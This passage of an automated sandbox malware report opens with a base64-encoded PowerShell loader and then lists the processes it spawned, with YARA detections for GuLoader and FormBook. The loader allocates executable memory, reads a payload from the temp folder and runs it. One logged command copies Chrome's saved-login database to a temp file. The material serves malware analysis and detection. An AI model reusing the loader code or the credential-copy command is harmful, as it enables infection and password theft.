GAGEAcgBtAGEAawAsAGkAbgB0ACAAUQB1AGkAbgBxAHUAZQB2AGUALABpAG4AdAAgAFMATABHAFQAKQA7AA0ACgBbAEQAbABsAEkAbQBwAG8AcgB0ACgAIgBuAHQAZABsAGwAIgApAF0AcAB1AGIAbABpAGMAIABzAHQAYQB0AGkAYwAgAGUAeAB0AGUAcgBuACAAaQBuAHQAIABOAHQAQQBsAGwAbwBjAGEAdABlAFYAaQByAHQAdQBhAGwATQBlAG0AbwByAHkAKABpAG4AdAAgAGMAaABvAG4AZAByAG8AZwBhADYALAByAGUAZgAgAEkAbgB0ADMAMgAgAEMAbABhAHQAaAByAGEANAAsAGkAbgB0ACAAVgBhAHIAZQBkAGUAawBsAGEALAByAGUAZgAgAEkAbgB0ADMAMgAgAGMAaABvAG4AZAByAG8AZwBhACwAaQBuAHQAIABPAHUAdABoAG8AdwBsAGkAbgBnADUALABpAG4AdAAgAGMAaABvAG4AZAByAG8AZwBhADcAKQA7AA0ACgBbAEQAbABsAEkAbQBwAG8AcgB0ACgAIgBLAEUAUgBOAEUATAAzADIAIgAsACAARQBuAHQAcgB5AFAAbwBpAG4AdAA9ACIAUgBlAGEAZABGAGkAbABlACIAKQBdAHAAdQBiAGwAaQBjACAAcwB0AGEAdABpAGMAIABlAHgAdABlAHIAbgAgAGkAbgB0ACAAQwBEAEEAQwAoAGkAbgB0ACAAVgBhAHIAZQBkAGUAawBsAGEAMAAsAHUAaQBuAHQAIABWAGEAcgBlAGQAZQBrAGwAYQAxACwASQBuAHQAUAB0AHIAIABWAGEAcgBlAGQAZQBrAGwAYQAyACwAcgBlAGYAIABJAG4AdAAzADIAIABWAGEAcgBlAGQAZQBrAGwAYQAzACwAaQBuAHQAIABWAGEAcgBlAGQAZQBrAGwAYQA0ACkAOwANAAoAWwBEAGwAbABJAG0AcABvAHIAdAAoACIAVQBTAEUAUgAzADIAIgApAF0AcAB1AGIAbABpAGMAIABzAHQAYQB0AGkAYwAgAGUAeAB0AGUAcgBuACAASQBuAHQAUAB0AHIAIABFAG4AdQBtAFcAaQBuAGQAbwB3AHMAKABJAG4AdABQAHQAcgAgAFYAYQByAGUAZABlAGsAbABhADUALABpAG4AdAAgAFYAYQByAGUAZABlAGsAbABhADYAKQA7AA0ACgANAAoAfQANAAoAIgBAAA0ACgAjAFIAZQBtAG8AcAA4ACAARABSAFQAUgBJAE4ARQBUAEkATgAgAFIAZQB0AHIAZQA0ACAAVABqAGUAcgByAGkAbAAgAFUAcgBzAGsAbwB2AHMAbQByACAARQB4AGkAbABpAGMAbQB5AHMAdAA2ACAASQBsAGQAcwBwAHkAZQBuAGQAZQAgAEIAYQBrAHQAIABNAEUATABJAE8AUgBBACAAcwByAHYAZQByAGkAIABBAHUAZwB1AHIAZQByACAADQAKACQAYwBoAG8AbgBkAHIAbwBnAGEAMgA9ACIAJABlAG4AdgA6AHQAZQBtAHAAIgAgACsAIAAiAFwASABlAHQAZQByAG8AMwAuAGQAYQB0ACIADQAKACMAcABvAHMAdABwACAATQBvAG4AbwB0AG8AbgBlAHIAZQAgAFMASQBHAE4ASQBGACAAVABpAGQAcwBrAHIAYQAgAEwARQBGAFQASQAgAFIARQBGAE8AUgBNAFAATABBAE4AIABLAGwAYQBnADUAIABSAG8AdABhAG0AYQBuACAASQBuAGQAaQB2ACAAUgBvAHQAdABlAGYAbgBnAGUAIABUAGUAcgByAGkAdABvAHIAaQAyACAAWABZAEwATwBDAE8AUABBAFAAIABnAG8AZwB5AGQAZQAgAE0AaQBjAHIAbwBiAGUAcAAgAA0ACgAkAGMAaABvAG4AZAByAG8AZwBhADMAPQAwADsADQAKACQAYwBoAG8AbgBkAHIAbwBnAGEAOQA9ADEAMAA0ADgANQA3ADYAOwANAAoAJABjAGgAbwBuAGQAcgBvAGcAYQA4AD0AWwBjAGgAbwBuAGQAcgBvAGcAYQAxAF0AOgA6AE4AdABBAGwAbABvAGMAYQB0AGUAVgBpAHIAdAB1AGEAbABNAGUAbQBvAHIAeQAoAC0AMQAsAFsAcgBlAGYAXQAkAGMAaABvAG4AZAByAG8AZwBhADMALAAwACwAWwByAGUAZgBdACQAYwBoAG8AbgBkAHIAbwBnAGEAOQAsADEAMgAyADgAOAAsADYANAApAA0ACgAjAEsAQQBSAFQATwAgAEMAaABpAGwAIABlAHMAcAByAGkAdABpAG4AcwB0ACAAUwBIAFIASQBMAEwASQBOACAAQgBPAFAATABTACAAQwByAHkAcAB0AG8AIABVAGsAcgBsAGkAZwBzAHQAZQAxACAATQBlAGwAbwB0AHIAYQAgAFMAVQBQAFAAUgBFAFMASQBWAEUAIABDAGgAZQBmACAAUgBvAHMAZQB2AGkAbgBlADUAIABCAGkAbABiAHIAbwBlAG4AcwBwACAAQQByAGIAZQBqADIAIABJAG4AdABlAHIAYwBhAG0AcAAgAEcARQBWAEEATABUAEkAIABSAFUAQwBIAEUAUgBTAFQARQBOACAARABJAFMAUABSACAADQAKACQAYwBoAG8AbgBkAHIAbwBnAGEANAA9AFsAYwBoAG8AbgBkAHIAbwBnAGEAMQBdADoAOgBWAGkAYQBjACgAJABjAGgAbwBuAGQAcgBvAGcAYQAyACwAMgAxADQANwA0ADgAMwA2ADQAOAAsADEALAAwACwAMwAsADEAMgA4ACwAMAApAA0ACgAjAGQAaQBmAGYAZQByAGUAbgAgAGgAYQB2AGUAIABNAG8AYgBpAGwAZQB0AHMAZwByADMAIABhAHIAawBmAGQAZQByACAAaQBuAGQAawAgAEsATABPAEQAUgBJAEEATgBFAFIAIABUAEEAUwBLAEUASwBSAEEAQgBCACAAUwBKAFUAUwBTACAAdwBoAGUAYQB0ACAASAB5AHAAbwBwAGgAeQBzACAAQQBmAGgAbwBsAGQAcwBoAG8AdAAzACAAVABoAHkAcgBvAGMAbwBsACAAVQBEAFYAVQAgAGIAdQBmAGYAIABwAG8AbAB5AGUAdABoACAAYgByAGkAcwBrAGUAdAB1AG4AdAAgAFQAWQBFAFQAQwBPAFEAIABDAG8AbQBwAGEAIABBAGYAdABhAGwAZQBwADYAIABzAHQAaQBuAGsAaQAgAEcARQBOAE4ARQBNAEIATwBSACAAYQBmAHQAZQByAHAAIABBAGwAaQBxAHUAYQBuADEAIABhAG4AdABpAG0AbwBuAHkAZwAgAEYAcgBhAG4AdABzACAAWgBJAFQASQAgAE4AQQBHAEwARQBUAEcAIABCAEwATwBUACAAQgBlAHMAbgBhAGsAawBlADcAIABVAE4ARABUAEEAIABCAHIAYQBzAGgAbAB5AGkAZwAgAA0ACgAkAGMAaABvAG4AZAByAG8AZwBhADUAPQAwADsADQAKACMAQgBvAGwAaQBkAGUAcwBzAGwAYQA1ACAATABBAE4ARABTAFIAIABQAHIAbwBzACAAVABsAGwAZQBzADgAIABPAG0AawBsAGEAcwBzAGkAZgBpADcAIABQAGUAbgB0AGEAYwByAG8AbgBrADQAIABIAEUAUABUAEEAVAAgAFcAYQBrAGUAcgAgAHIAZQBnAGkAbwAgAFUAZwBlAHMAawByAGkANwAgAFMAbABhAHIANAAgAEYATwBSAEUATAAgAA0ACgBbAGMAaABvAG4AZAByAG8AZwBhADEAXQA6ADoAQwBEAEEAQwAoACQAYwBoAG8AbgBkAHIAbwBnAGEANAAsACQAYwBoAG8AbgBkAHIAbwBnAGEAMwAsADUAOAA3ADYANwAsAFsAcgBlAGYAXQAkAGMAaABvAG4AZAByAG8AZwBhADUALAAwACkADQAKACMAQgBFAFMASwAgAFMAdAByAGUAZQB0AHcAYQByAGQANwAgAEwAZQBqAHIAdQBkAHMAdAB5AHIANgAgAFUAbgBsAGEAbgBnAHUAIAB1AG4AawBpAG4AZAAgAEgAQQBLAE0AIAB3AHIAaQBnAGgAdAByAHkAIABCAGEAZwBnAGEAYQByAGQAZQBuADIAIABTAHUAYgBjAG8AbgB0AHIAYQA4ACAAZgBsAGEAdgAgAEcAcgBhAHYAcwB0AGUAZAA3ACAASABpAGcAaABoAGEAdABiAGEAIABTAGgAYQBoACAADQAKAFsAYwBoAG8AbgBkAHIAbwBnAGEAMQBdADoAOgBFAG4AdQBtAFcAaQBuAGQAbwB3AHMAKAAkAGMAaABvAG4AZAByAG8AZwBhADMALAAgADAAKQANAAoADQAKAA==
                                                                                                  Imagebase:0x5d0000
                                                                                                  File size:433152 bytes
                                                                                                  MD5 hash:C32CA4ACFCC635EC1EA6ED8A34DF5FAC
                                                                                                  Has elevated privileges:true
                                                                                                  Has administrator privileges:true
                                                                                                  Programmed in:.Net C# or VB.NET
                                                                                                  Yara matches:
                                                                                                  • Rule: JoeSecurity_GuLoader_2, Description: Yara detected GuLoader, Source: 0000000D.00000002.1828222321.0000000009C70000.00000040.00000800.00020000.00000000.sdmp, Author: Joe Security
                                                                                                  Reputation:moderate

                                                                                                  Target ID:14
                                                                                                  Start time:14:22:01
                                                                                                  Start date:10/05/2022
                                                                                                  Path:C:\Windows\System32\conhost.exe
                                                                                                  Wow64 process (32bit):false
                                                                                                  Commandline:C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                                                                                                  Imagebase:0x7ff698ef0000
                                                                                                  File size:875008 bytes
                                                                                                  MD5 hash:81CA40085FC75BABD2C91D18AA9FFA68
                                                                                                  Has elevated privileges:true
                                                                                                  Has administrator privileges:true
                                                                                                  Programmed in:C, C++ or other language
                                                                                                  Reputation:moderate

                                                                                                  Target ID:23
                                                                                                  Start time:14:22:23
                                                                                                  Start date:10/05/2022
                                                                                                  Path:C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exe
                                                                                                  Wow64 process (32bit):true
                                                                                                  Commandline:C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exe" /noconfig /fullpaths @"C:\Users\user\AppData\Local\Temp\gkb1wfd4\gkb1wfd4.cmdline
                                                                                                  Imagebase:0xc20000
                                                                                                  File size:2141552 bytes
                                                                                                  MD5 hash:EB80BB1CA9B9C7F516FF69AFCFD75B7D
                                                                                                  Has elevated privileges:true
                                                                                                  Has administrator privileges:true
                                                                                                  Programmed in:.Net C# or VB.NET
                                                                                                  Reputation:moderate

                                                                                                  Target ID:24
                                                                                                  Start time:14:22:23
                                                                                                  Start date:10/05/2022
                                                                                                  Path:C:\Windows\Microsoft.NET\Framework\v4.0.30319\cvtres.exe
                                                                                                  Wow64 process (32bit):true
                                                                                                  Commandline:C:\Windows\Microsoft.NET\Framework\v4.0.30319\cvtres.exe /NOLOGO /READONLY /MACHINE:IX86 "/OUT:C:\Users\user\AppData\Local\Temp\RES2E9C.tmp" "c:\Users\user\AppData\Local\Temp\gkb1wfd4\CSC1FB6CDA7423C41F280B0C76B8C389BB7.TMP"
                                                                                                  Imagebase:0xb70000
                                                                                                  File size:46832 bytes
                                                                                                  MD5 hash:70D838A7DC5B359C3F938A71FAD77DB0
                                                                                                  Has elevated privileges:true
                                                                                                  Has administrator privileges:true
                                                                                                  Programmed in:C, C++ or other language
                                                                                                  Reputation:moderate

                                                                                                  Target ID:26
                                                                                                  Start time:14:22:37
                                                                                                  Start date:10/05/2022
                                                                                                  Path:C:\Program Files (x86)\Internet Explorer\ieinstal.exe
                                                                                                  Wow64 process (32bit):false
                                                                                                  Commandline:C:\Program Files (x86)\internet explorer\ieinstal.exe
                                                                                                  Imagebase:0xf0000
                                                                                                  File size:480256 bytes
                                                                                                  MD5 hash:7871873BABCEA94FBA13900B561C7C55
                                                                                                  Has elevated privileges:true
                                                                                                  Has administrator privileges:true
                                                                                                  Programmed in:C, C++ or other language
                                                                                                  Reputation:moderate

                                                                                                  Target ID:27
                                                                                                  Start time:14:22:37
                                                                                                  Start date:10/05/2022
                                                                                                  Path:C:\Program Files (x86)\Internet Explorer\ieinstal.exe
                                                                                                  Wow64 process (32bit):true
                                                                                                  Commandline:C:\Program Files (x86)\internet explorer\ieinstal.exe
                                                                                                  Imagebase:0xf0000
                                                                                                  File size:480256 bytes
                                                                                                  MD5 hash:7871873BABCEA94FBA13900B561C7C55
                                                                                                  Has elevated privileges:true
                                                                                                  Has administrator privileges:true
                                                                                                  Programmed in:C, C++ or other language
                                                                                                  Yara matches:
                                                                                                  • Rule: JoeSecurity_FormBook, Description: Yara detected FormBook, Source: 0000001B.00000002.1967295052.0000000002D60000.00000040.10000000.00040000.00000000.sdmp, Author: Joe Security
                                                                                                  • Rule: Formbook, Description: detect Formbook in memory, Source: 0000001B.00000002.1967295052.0000000002D60000.00000040.10000000.00040000.00000000.sdmp, Author: JPCERT/CC Incident Response Group
                                                                                                  • Rule: Formbook_1, Description: autogenerated rule brought to you by yara-signator, Source: 0000001B.00000002.1967295052.0000000002D60000.00000040.10000000.00040000.00000000.sdmp, Author: Felix Bilstein - yara-signator at cocacoding dot com
                                                                                                  • Rule: JoeSecurity_FormBook, Description: Yara detected FormBook, Source: 0000001B.00000002.1993285562.000000001EC30000.00000040.10000000.00040000.00000000.sdmp, Author: Joe Security
                                                                                                  • Rule: Formbook, Description: detect Formbook in memory, Source: 0000001B.00000002.1993285562.000000001EC30000.00000040.10000000.00040000.00000000.sdmp, Author: JPCERT/CC Incident Response Group
                                                                                                  • Rule: Formbook_1, Description: autogenerated rule brought to you by yara-signator, Source: 0000001B.00000002.1993285562.000000001EC30000.00000040.10000000.00040000.00000000.sdmp, Author: Felix Bilstein - yara-signator at cocacoding dot com
                                                                                                  • Rule: JoeSecurity_GuLoader_2, Description: Yara detected GuLoader, Source: 0000001B.00000000.1581138721.0000000003000000.00000040.00000400.00020000.00000000.sdmp, Author: Joe Security
                                                                                                  Reputation:moderate

                                                                                                  Target ID:28
                                                                                                  Start time:14:22:51
                                                                                                  Start date:10/05/2022
                                                                                                  Path:C:\Windows\explorer.exe
                                                                                                  Wow64 process (32bit):false
                                                                                                  Commandline:C:\Windows\Explorer.EXE
                                                                                                  Imagebase:0x7ff7a3360000
                                                                                                  File size:4849904 bytes
                                                                                                  MD5 hash:5EA66FF5AE5612F921BC9DA23BAC95F7
                                                                                                  Has elevated privileges:false
                                                                                                  Has administrator privileges:false
                                                                                                  Programmed in:C, C++ or other language
                                                                                                  Yara matches:
                                                                                                  • Rule: JoeSecurity_FormBook, Description: Yara detected FormBook, Source: 0000001C.00000000.1882463861.000000000AD63000.00000040.00000001.00040000.00000000.sdmp, Author: Joe Security
                                                                                                  • Rule: Formbook, Description: detect Formbook in memory, Source: 0000001C.00000000.1882463861.000000000AD63000.00000040.00000001.00040000.00000000.sdmp, Author: JPCERT/CC Incident Response Group
                                                                                                  • Rule: Formbook_1, Description: autogenerated rule brought to you by yara-signator, Source: 0000001C.00000000.1882463861.000000000AD63000.00000040.00000001.00040000.00000000.sdmp, Author: Felix Bilstein - yara-signator at cocacoding dot com
                                                                                                  • Rule: JoeSecurity_FormBook, Description: Yara detected FormBook, Source: 0000001C.00000000.1804806657.000000000AD63000.00000040.00000001.00040000.00000000.sdmp, Author: Joe Security
                                                                                                  • Rule: Formbook, Description: detect Formbook in memory, Source: 0000001C.00000000.1804806657.000000000AD63000.00000040.00000001.00040000.00000000.sdmp, Author: JPCERT/CC Incident Response Group
                                                                                                  • Rule: Formbook_1, Description: autogenerated rule brought to you by yara-signator, Source: 0000001C.00000000.1804806657.000000000AD63000.00000040.00000001.00040000.00000000.sdmp, Author: Felix Bilstein - yara-signator at cocacoding dot com
                                                                                                  Reputation:moderate

                                                                                                  Target ID:32
                                                                                                  Start time:14:23:13
                                                                                                  Start date:10/05/2022
                                                                                                  Path:C:\Windows\SysWOW64\chkdsk.exe
                                                                                                  Wow64 process (32bit):true
                                                                                                  Commandline:C:\Windows\SysWOW64\chkdsk.exe
                                                                                                  Imagebase:0xba0000
                                                                                                  File size:23040 bytes
                                                                                                  MD5 hash:B4016BEE9D8F3AD3D02DD21C3CAFB922
                                                                                                  Has elevated privileges:false
                                                                                                  Has administrator privileges:false
                                                                                                  Programmed in:C, C++ or other language
                                                                                                  Yara matches:
                                                                                                  • Rule: JoeSecurity_FormBook, Description: Yara detected FormBook, Source: 00000020.00000002.5730000844.0000000004BB0000.00000004.00000800.00020000.00000000.sdmp, Author: Joe Security
                                                                                                  • Rule: Formbook, Description: detect Formbook in memory, Source: 00000020.00000002.5730000844.0000000004BB0000.00000004.00000800.00020000.00000000.sdmp, Author: JPCERT/CC Incident Response Group
                                                                                                  • Rule: Formbook_1, Description: autogenerated rule brought to you by yara-signator, Source: 00000020.00000002.5730000844.0000000004BB0000.00000004.00000800.00020000.00000000.sdmp, Author: Felix Bilstein - yara-signator at cocacoding dot com
                                                                                                  • Rule: JoeSecurity_FormBook, Description: Yara detected FormBook, Source: 00000020.00000002.5716637360.0000000000700000.00000040.80000000.00040000.00000000.sdmp, Author: Joe Security
                                                                                                  • Rule: Formbook, Description: detect Formbook in memory, Source: 00000020.00000002.5716637360.0000000000700000.00000040.80000000.00040000.00000000.sdmp, Author: JPCERT/CC Incident Response Group
                                                                                                  • Rule: Formbook_1, Description: autogenerated rule brought to you by yara-signator, Source: 00000020.00000002.5716637360.0000000000700000.00000040.80000000.00040000.00000000.sdmp, Author: Felix Bilstein - yara-signator at cocacoding dot com
                                                                                                  • Rule: JoeSecurity_FormBook, Description: Yara detected FormBook, Source: 00000020.00000002.5728868975.0000000000B70000.00000040.10000000.00040000.00000000.sdmp, Author: Joe Security
                                                                                                  • Rule: Formbook, Description: detect Formbook in memory, Source: 00000020.00000002.5728868975.0000000000B70000.00000040.10000000.00040000.00000000.sdmp, Author: JPCERT/CC Incident Response Group
                                                                                                  • Rule: Formbook_1, Description: autogenerated rule brought to you by yara-signator, Source: 00000020.00000002.5728868975.0000000000B70000.00000040.10000000.00040000.00000000.sdmp, Author: Felix Bilstein - yara-signator at cocacoding dot com

                                                                                                  Target ID:33
                                                                                                  Start time:14:23:36
                                                                                                  Start date:10/05/2022
                                                                                                  Path:C:\Windows\SysWOW64\cmd.exe
                                                                                                  Wow64 process (32bit):true
                                                                                                  Commandline:/c copy "C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Login Data" "C:\Users\user\AppData\Local\Temp\DB1" /V
                                                                                                  Imagebase:0x600000
                                                                                                  File size:236544 bytes
                                                                                                  MD5 hash:D0FCE3AFA6AA1D58CE9FA336CC2B675B
                                                                                                  Has elevated privileges:false
                                                                                                  Has administrator privileges:false
                                                                                                  Programmed in:C, C++ or other language

                                                                                                  Target ID:34
                                                                                                  Start time:14:23:36
                                                                                                  Start date:10/05/2022
                                                                                                  Path:C:\Windows\System32\conhost.exe
                                                                                                  Wow64 process (32bit):false
                                                                                                  Commandline:C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                                                                                                  Imagebase:0x7ff698ef0000
                                                                                                  File size:875008 bytes
                                                                                                  MD5 hash:81CA40085FC75BABD2C91D18AA9FFA68
                                                                                                  Has elevated privileges:false
                                                                                                  Has administrator privileges:false
                                                                                                  Programmed in:C, C++ or other language

                                                                                                  Target ID:35
                                                                                                  Start time:14:23:36
                                                                                                  Start date:10/05/2022
                                                                                                  Path:C:\Program Files (x86)\Internet Explorer\ieinstal.exe
                                                                                                  Wow64 process (32bit):true
                                                                                                  Commandline:"C:\Program Files (x86)\internet explorer\ieinstal.exe"
                                                                                                  Imagebase:0xf0000
                                                                                                  File size:480256 bytes
                                                                                                  MD5 hash:7871873BABCEA94FBA13900B561C7C55
                                                                                                  Has elevated privileges:false
                                                                                                  Has administrator privileges:false
                                                                                                  Programmed in:C, C++ or other language

                                                                                                  Target ID:36
                                                                                                  Start time:14:23:45
                                                                                                  Start date:10/05/2022
                                                                                                  Path:C:\Program Files (x86)\Internet Explorer\ieinstal.exe
                                                                                                  Wow64 process (32bit):true
                                                                                                  Commandline:"C:\Program Files (x86)\internet explorer\ieinstal.exe"
                                                                                                  Imagebase:0xf0000
                                                                                                  File size:480256 bytes
                                                                                                  MD5 hash:7871873BABCEA94FBA13900B561C7C55
                                                                                                  Has elevated privileges:false
                                                                                                  Has administrator privileges:false
                                                                                                  Programmed in:C, C++ or other language

                                                                                                  Target ID:37
                                                                                                  Start time:14:23:57
                                                                                                  Start date:10/05/2022
                                                                                                  Path:C:\Program Files\Mozilla Firefox\firefox.exe
                                                                                                  Wow64 process (32bit):false
                                                                                                  Commandline:C:\Program Files\Mozilla Firefox\Firefox.exe
                                                                                                  Imagebase:0x7ff62d2d0000
                                                                                                  File size:597432 bytes
                                                                                                  MD5 hash:FA9F4FC5D7ECAB5A20BF7A9D1251C851
                                                                                                  Has elevated privileges:false
                                                                                                  Has administrator privileges:false
                                                                                                  Programmed in:C, C++ or other language

                                                                                                  No disassembly